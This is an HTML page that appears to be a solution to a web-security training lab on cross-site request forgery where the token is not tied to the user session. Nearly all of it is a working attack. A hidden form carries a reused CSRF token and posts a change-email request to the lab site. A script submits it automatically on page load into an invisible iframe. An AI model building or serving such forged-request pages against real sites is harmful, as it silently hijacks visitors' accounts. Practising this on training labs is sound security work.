<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Test</title>
  </head>
  <body>
    <h1>Cyber Security</h1>
    <p>=D</p>

    <small
      >CSRF where token is not tied to user session</small
    >
    <iframe style="display: none" name="csrf-iframe"></iframe>
    <form
      action="https://0a590009038433d880d89efa00c900b3.web-security-academy.net/my-account/change-email"
      method="POST"
      target="csrf-iframe"
      id="csrf-form"
    >
      <input type="hidden" name="email" value="test@test.com" />
      <input type="hidden" name="csrf" value="eWIAsMtSZVgkwgugXybtu3mXtK98jEGu">
    </form>

    <script>
      document.getElementById("csrf-form").submit();
    </script>
  </body>
</html>